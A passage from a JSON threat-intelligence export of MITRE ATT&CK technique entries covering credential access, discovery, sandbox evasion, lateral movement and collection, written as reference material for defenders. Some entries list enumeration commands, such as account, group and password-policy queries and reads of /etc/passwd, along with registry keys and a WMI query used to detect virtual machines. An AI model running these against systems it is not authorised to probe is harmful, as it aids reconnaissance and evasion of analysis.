parameters"],"mitre_platforms":["Windows","Linux","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1003","https:\/\/capec.mitre.org\/data\/definitions\/567.html","https:\/\/github.com\/Neohapsis\/creddump7","https:\/\/en.wikipedia.org\/wiki\/Active_Directory","https:\/\/msdn.microsoft.com\/library\/cc422924.aspx","http:\/\/blogs.technet.com\/b\/srd\/archive\/2014\/05\/13\/ms14-025-an-update-for-group-policy-preferences.aspx","https:\/\/obscuresecurity.blogspot.co.uk\/2012\/05\/gpp-password-retrieval-with-powershell.html","https:\/\/blogs.technet.microsoft.com\/askpfeplat\/2016\/04\/18\/the-importance-of-kb2871997-and-kb2928120-for-credential-protection\/","https:\/\/docs.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-vista\/cc749211(v=ws.10)","https:\/\/msdn.microsoft.com\/library\/cc228086.aspx","https:\/\/msdn.microsoft.com\/library\/dd207691.aspx","https:\/\/wiki.samba.org\/index.php\/DRSUAPI","https:\/\/source.winehq.org\/WineAPI\/samlib.html","https:\/\/adsecurity.org\/?p=1729","http:\/\/www.harmj0y.net\/blog\/redteaming\/mimikatz-and-dcsync-and-extrasids-oh-my\/","https:\/\/blog.stealthbits.com\/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM","https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\/module-~-lsadump","https:\/\/msdn.microsoft.com\/library\/cc237008.aspx","https:\/\/github.com\/mattifestation\/PowerSploit","https:\/\/msdn.microsoft.com\/library\/cc245496.aspx"]},"local":false},{"id":"1077","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Domain Trust Discovery - T1482","tag_name":"misp-galaxy:mitre-attack-pattern=\"Domain Trust Discovery - T1482\"","description":"Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https:\/\/attack.mitre.org\/tactics\/TA0008) opportunities in Windows multi-domain\/forest environments. 
Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https:\/\/attack.mitre.org\/techniques\/T1178), [Pass the Ticket](https:\/\/attack.mitre.org\/techniques\/T1097), and [Kerberoasting](https:\/\/attack.mitre.org\/techniques\/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https:\/\/attack.mitre.org\/software\/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"767dbf9e-df3f-45cb-8998-4903ab5f80c0","tag_id":"774","meta":{"external_id":["T1482"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["PowerShell logs","API monitoring","Process command-line parameters","Process monitoring"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1482","https:\/\/docs.microsoft.com\/en-us\/previous-versions\/windows\/it-pro\/windows-server-2003\/cc759554(v=ws.10)","https:\/\/adsecurity.org\/?p=1588","http:\/\/www.harmj0y.net\/blog\/redteaming\/a-guide-to-attacking-domain-trusts\/ 
","https:\/\/www.microsoft.com\/security\/blog\/2017\/05\/04\/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack\/","https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships"]},"local":false},{"id":"1178","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Account Discovery - T1087","tag_name":"misp-galaxy:mitre-attack-pattern=\"Account Discovery - T1087\"","description":"Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are net user<\/code>, net group <\/code>, and net localgroup <\/code> using the [Net](https:\/\/attack.mitre.org\/software\/S0039) utility or through use of [dsquery](https:\/\/attack.mitre.org\/software\/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner\/User Discovery](https:\/\/attack.mitre.org\/techniques\/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the groups<\/code> and id<\/code> commands. In mac specifically, dscl . list \/Groups<\/code> and dscacheutil -q group<\/code> can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the \/etc\/passwd<\/code> file which is world readable. 
In mac, this same file is only used in single-user mode in addition to the \/etc\/master.passwd<\/code> file.\n\nAlso, groups can be enumerated through the groups<\/code> and id<\/code> commands.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"72b74d71-8169-42aa-92e0-e7b04b9f5a08","tag_id":"735","meta":{"external_id":["CAPEC-575"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["API monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1087","https:\/\/capec.mitre.org\/data\/definitions\/575.html"]},"local":false},{"id":"1013","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Network Service Scanning - T1046","tag_name":"misp-galaxy:mitre-attack-pattern=\"Network Service Scanning - T1046\"","description":"Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. 
Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"e3a12395-188d-4051-9a16-ea8e14d07b88","tag_id":"775","meta":{"external_id":["T1046"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Netflow\/Enclave netflow","Network protocol analysis","Packet capture","Process command-line parameters","Process use of network"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1046"]},"local":false},{"id":"1038","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Network Share Discovery - T1135","tag_name":"misp-galaxy:mitre-attack-pattern=\"Network Share Discovery - T1135\"","description":"Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https:\/\/attack.mitre.org\/software\/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem<\/code> command. 
It can also be used to query shared drives on the local system using net share<\/code>.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the df -aH<\/code> command.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"3489cfc5-640f-4bb3-a103-9137b97de79f","tag_id":"776","meta":{"external_id":["T1135"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters","Network protocol analysis","Process use of network"],"mitre_platforms":["macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1135","https:\/\/en.wikipedia.org\/wiki\/Shared_resource","https:\/\/technet.microsoft.com\/library\/cc770880.aspx"]},"local":false},{"id":"990","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Password Policy Discovery - T1201","tag_name":"misp-galaxy:mitre-attack-pattern=\"Password Policy Discovery - T1201\"","description":"Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https:\/\/attack.mitre.org\/techniques\/T1110). An adversary may attempt to access detailed information about the password policy used within an enterprise network. This would help the adversary to create a list of common passwords and launch dictionary and\/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems. 
(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)\n\n### Windows\n* net accounts<\/code>\n* net accounts \/domain<\/code>\n\n### Linux\n* chage -l <\/code>\n* cat \/etc\/pam.d\/common-password<\/code>\n\n### macOS\n* pwpolicy getaccountpolicies<\/code>","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"b6075259-dba3-44e9-87c7-e954f37ec0d5","tag_id":"777","meta":{"external_id":["T1201"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process command-line parameters","Process monitoring"],"mitre_platforms":["Windows","Linux","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1201","https:\/\/superuser.com\/questions\/150675\/how-to-display-password-policy-information-for-a-user-ubuntu","https:\/\/www.jamf.com\/jamf-nation\/discussions\/18574\/user-password-policies-on-non-ad-machines"]},"local":false},{"id":"905","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"File and Directory Discovery - T1083","tag_name":"misp-galaxy:mitre-attack-pattern=\"File and Directory Discovery - T1083\"","description":"Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \n\n### Windows\n\nExample utilities used to obtain this information are dir<\/code> and tree<\/code>. 
(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.\n\n### Mac and Linux\n\nIn Mac and Linux, this kind of discovery is accomplished with the ls<\/code>, find<\/code>, and locate<\/code> commands.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7bc57495-ea59-4380-be31-a64af124ef18","tag_id":"778","meta":{"external_id":["T1083"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1083","http:\/\/blog.jpcert.or.jp\/2016\/01\/windows-commands-abused-by-attackers.html"]},"local":false},{"id":"1177","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Process Discovery - T1057","tag_name":"misp-galaxy:mitre-attack-pattern=\"Process Discovery - T1057\"","description":"Adversaries may attempt to get information about running processes on a system. 
Information obtained could be used to gain an understanding of common software running on systems within the network.\n\n### Windows\n\nAn example command that would obtain details on processes is \"tasklist\" using the [Tasklist](https:\/\/attack.mitre.org\/software\/S0057) utility.\n\n### Mac and Linux\n\nIn Mac and Linux, this is accomplished with the ps<\/code> command.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"8f4a33ec-8b1f-4b80-a2f6-642b2e479580","tag_id":"779","meta":{"external_id":["CAPEC-573"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1057","https:\/\/capec.mitre.org\/data\/definitions\/573.html"]},"local":false},{"id":"1020","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Permission Groups Discovery - T1069","tag_name":"misp-galaxy:mitre-attack-pattern=\"Permission Groups Discovery - T1069\"","description":"Adversaries may attempt to find local system or domain-level groups and permissions settings. \n\n### Windows\n\nExamples of commands that can list groups are net group \/domain<\/code> and net localgroup<\/code> using the [Net](https:\/\/attack.mitre.org\/software\/S0039) utility.\n\n### Mac\n\nOn Mac, this same thing can be accomplished with the dscacheutil -q group<\/code> for the domain, or dscl . 
-list \/Groups<\/code> for local groups.\n\n### Linux\n\nOn Linux, local groups can be enumerated with the groups<\/code> command and domain groups via the ldapsearch<\/code> command.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"15dbf668-795c-41e6-8219-f0447c0e64ce","tag_id":"780","meta":{"external_id":["CAPEC-576"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["API monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1069","https:\/\/capec.mitre.org\/data\/definitions\/576.html"]},"local":false},{"id":"1005","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"System Information Discovery - T1082","tag_name":"misp-galaxy:mitre-attack-pattern=\"System Information Discovery - T1082\"","description":"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.\n\n### Windows\n\nExample commands and utilities that obtain this information include ver<\/code>, [Systeminfo](https:\/\/attack.mitre.org\/software\/S0096), and dir<\/code> within [cmd](https:\/\/attack.mitre.org\/software\/S0106) for identifying information based on present files and directories.\n\n### Mac\n\nOn Mac, the systemsetup<\/code> command gives a detailed breakdown of the system, but it requires administrative privileges. 
Additionally, the system_profiler<\/code> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"354a7f88-63fb-41b5-a801-ce3b377b36f1","tag_id":"781","meta":{"external_id":["CAPEC-311"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1082","https:\/\/capec.mitre.org\/data\/definitions\/311.html"]},"local":false},{"id":"1009","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Security Software Discovery - T1063","tag_name":"misp-galaxy:mitre-attack-pattern=\"Security Software Discovery - T1063\"","description":"Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. 
These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https:\/\/attack.mitre.org\/software\/S0108), reg query<\/code> with [Reg](https:\/\/attack.mitre.org\/software\/S0075), dir<\/code> with [cmd](https:\/\/attack.mitre.org\/software\/S0106), and [Tasklist](https:\/\/attack.mitre.org\/software\/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"241814ae-de3f-4656-b49e-f9a80764d4b7","tag_id":"782","meta":{"external_id":["T1063"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1063"]},"local":false},{"id":"986","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"System Service Discovery - T1007","tag_name":"misp-galaxy:mitre-attack-pattern=\"System Service Discovery - T1007\"","description":"Adversaries may try to get information about registered services. 
Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist \/svc\" using [Tasklist](https:\/\/attack.mitre.org\/software\/S0057), and \"net start\" using [Net](https:\/\/attack.mitre.org\/software\/S0039), but adversaries may also use other tools as well.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"322bad5a-1c49-4d23-ab79-76d641794afa","tag_id":"783","meta":{"external_id":["CAPEC-574"],"kill_chain":["mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1007","https:\/\/capec.mitre.org\/data\/definitions\/574.html"]},"local":false},{"id":"1124","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Virtualization\/Sandbox Evasion - T1497","tag_name":"misp-galaxy:mitre-attack-pattern=\"Virtualization\/Sandbox Evasion - T1497\"","description":"Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. \n\nAdversaries may use several methods including [Security Software Discovery](https:\/\/attack.mitre.org\/techniques\/T1063) to accomplish [Virtualization\/Sandbox Evasion](https:\/\/attack.mitre.org\/techniques\/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. 
(Citation: Unit 42 Pirpi July 2015)\n\n###Virtual Machine Environment Artifacts Discovery###\n\nAdversaries may use utilities such as [Windows Management Instrumentation](https:\/\/attack.mitre.org\/techniques\/T1047), [PowerShell](https:\/\/attack.mitre.org\/techniques\/T1086), [Systeminfo](https:\/\/attack.mitre.org\/software\/S0096), and the [Query Registry](https:\/\/attack.mitre.org\/techniques\/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and\/or the Registry. Adversaries may use [Scripting](https:\/\/attack.mitre.org\/techniques\/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I\/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. \n\nExample VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)\n\n* HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions<\/code>\n* HKLM\\HARDWARE\\Description\\System\\\u201dSystemBiosVersion\u201d;\u201dVMWARE\u201d<\/code>\n* HKLM\\HARDWARE\\ACPI\\DSDT\\BOX_<\/code>\n\nExample VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)\n\n* WINDOWS\\system32\\drivers\\vmmouse.sys<\/code> \n* WINDOWS\\system32\\vboxhook.dll<\/code>\n* Windows\\system32\\vboxdisp.dll<\/code>\n\nCommon checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer\/product fields for strings relating to virtual machine applications, and VME-specific hardware\/processor instructions.(Citation: McAfee Virtual Jan 2017)\n\n###User Activity Discovery###\n\nAdversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) 
for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it\u2019s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).\n\n###Virtual Hardware Fingerprinting Discovery###\n\nAdversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = \u201cSelect * from Win32_Fan\u201d Get-WmiObject -Query $q<\/code>. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. 
(Citation: Unit 42 OilRig Sept 2018)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"82caa33e-d11a-433a-94ea-9b5a5fbef81d","tag_id":"784","meta":{"external_id":["T1497"],"kill_chain":["mitre-attack:defense-evasion","mitre-attack:discovery"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1497","https:\/\/unit42.paloaltonetworks.com\/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload\/","https:\/\/securingtomorrow.mcafee.com\/other-blogs\/mcafee-labs\/stopping-malware-fake-virtual-machine\/","https:\/\/www.sans.org\/reading-room\/whitepapers\/forensics\/detecting-malware-sandbox-evasion-techniques-36667","https:\/\/unit42.paloaltonetworks.com\/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan\/","https:\/\/www.fireeye.com\/blog\/threat-research\/2017\/04\/fin7-phishing-lnk.html","https:\/\/researchcenter.paloaltonetworks.com\/2018\/09\/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie\/"]},"local":false},{"id":"1167","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Logon Scripts - T1037","tag_name":"misp-galaxy:mitre-attack-pattern=\"Logon Scripts - T1037\"","description":"### Windows\n\nWindows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.\n\nIf adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. 
This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.\n\n### Mac\n\nMac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"03259939-0b57-482f-8eb5-87c0e0d54334","tag_id":"785","meta":{"external_id":["CAPEC-564"],"kill_chain":["mitre-attack:lateral-movement","mitre-attack:persistence"],"mitre_data_sources":["File monitoring","Process monitoring"],"mitre_platforms":["macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1037","https:\/\/capec.mitre.org\/data\/definitions\/564.html","https:\/\/technet.microsoft.com\/en-us\/library\/cc758918(v=ws.10).aspx","https:\/\/support.apple.com\/de-at\/HT2420"]},"local":false},{"id":"1022","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Pass the Ticket - T1097","tag_name":"misp-galaxy:mitre-attack-pattern=\"Pass the Ticket - T1097\"","description":"Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. 
Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nIn this technique, valid Kerberos tickets for [Valid Accounts](https:\/\/attack.mitre.org\/techniques\/T1078) are captured by [Credential Dumping](https:\/\/attack.mitre.org\/techniques\/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)\n\nSilver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)\n\nGolden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. 
(Citation: Campbell 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"a257ed11-ff3b-4216-8c9d-3938ef57064c","tag_id":"786","meta":{"external_id":["T1097"],"kill_chain":["mitre-attack:lateral-movement"],"mitre_data_sources":["Authentication logs"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1097","http:\/\/defcon.org\/images\/defcon-22\/dc-22-presentations\/Campbell\/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf","https:\/\/adsecurity.org\/?p=556","http:\/\/blog.gentilkiwi.com\/securite\/mimikatz\/pass-the-ticket-kerberos","https:\/\/cert.europa.eu\/static\/WhitePapers\/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"]},"local":false},{"id":"1021","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Windows Admin Shares - T1077","tag_name":"misp-galaxy:mitre-attack-pattern=\"Windows Admin Shares - T1077\"","description":"Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$<\/code>, ADMIN$<\/code>, and IPC$<\/code>. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https:\/\/attack.mitre.org\/techniques\/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB\/RPC are [Scheduled Task](https:\/\/attack.mitre.org\/techniques\/T1053), [Service Execution](https:\/\/attack.mitre.org\/techniques\/T1035), and [Windows Management Instrumentation](https:\/\/attack.mitre.org\/techniques\/T1047). 
Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https:\/\/attack.mitre.org\/techniques\/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https:\/\/attack.mitre.org\/software\/S0039) utility can be used to connect to Windows admin shares on remote systems using net use<\/code> commands with valid credentials. (Citation: Technet Net Use)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"ffe742ed-9100-4686-9e00-c331da544787","tag_id":"787","meta":{"external_id":["CAPEC-561"],"kill_chain":["mitre-attack:lateral-movement"],"mitre_data_sources":["Process use of network","Authentication logs","Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1077","https:\/\/capec.mitre.org\/data\/definitions\/561.html","http:\/\/support.microsoft.com\/kb\/314984","http:\/\/blogs.technet.com\/b\/jepayne\/archive\/2015\/11\/27\/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts.aspx","http:\/\/blogs.technet.com\/b\/jepayne\/archive\/2015\/11\/24\/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem.aspx","https:\/\/en.wikipedia.org\/wiki\/Server_Message_Block","https:\/\/technet.microsoft.com\/en-us\/library\/cc787851.aspx","https:\/\/technet.microsoft.com\/bb490717.aspx"]},"local":false},{"id":"1006","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Windows Remote Management - T1028","tag_name":"misp-galaxy:mitre-attack-pattern=\"Windows Remote Management - T1028\"","description":"Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). 
(Citation: Microsoft WinRM) It may be called with the winrm<\/code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"c3bce4f4-9795-46c6-976e-8676300bbc39","tag_id":"788","meta":{"external_id":["T1028"],"kill_chain":["mitre-attack:execution","mitre-attack:lateral-movement"],"mitre_data_sources":["File monitoring","Authentication logs","Netflow\/Enclave netflow","Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1028","http:\/\/msdn.microsoft.com\/en-us\/library\/aa384426","https:\/\/www.slideshare.net\/kieranjacobsen\/lateral-movement-with-power-shell-2"]},"local":false},{"id":"1191","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Automated Collection - T1119","tag_name":"misp-galaxy:mitre-attack-pattern=\"Automated Collection - T1119\"","description":"Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https:\/\/attack.mitre.org\/techniques\/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
\n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https:\/\/attack.mitre.org\/techniques\/T1083) and [Remote File Copy](https:\/\/attack.mitre.org\/techniques\/T1105) to identify and move files.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"30208d3e-0d6b-43c8-883e-44462a514619","tag_id":"789","meta":{"external_id":["T1119"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Data loss prevention","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1119"]},"local":false},{"id":"1173","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Data Staged - T1074","tag_name":"misp-galaxy:mitre-attack-pattern=\"Data Staged - T1074\"","description":"Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https:\/\/attack.mitre.org\/techniques\/T1002) or [Data Encrypted](https:\/\/attack.mitre.org\/techniques\/T1022).\n\nInteractive command shells may be used, and common functionality within [cmd](https:\/\/attack.mitre.org\/software\/S0106) and bash may be used to copy data into a staging location.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7dd95ff6-712e-4056-9626-312ea4ab4c5e","tag_id":"737","meta":{"external_id":["T1074"],"kill_chain":["mitre-attack:collection"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line 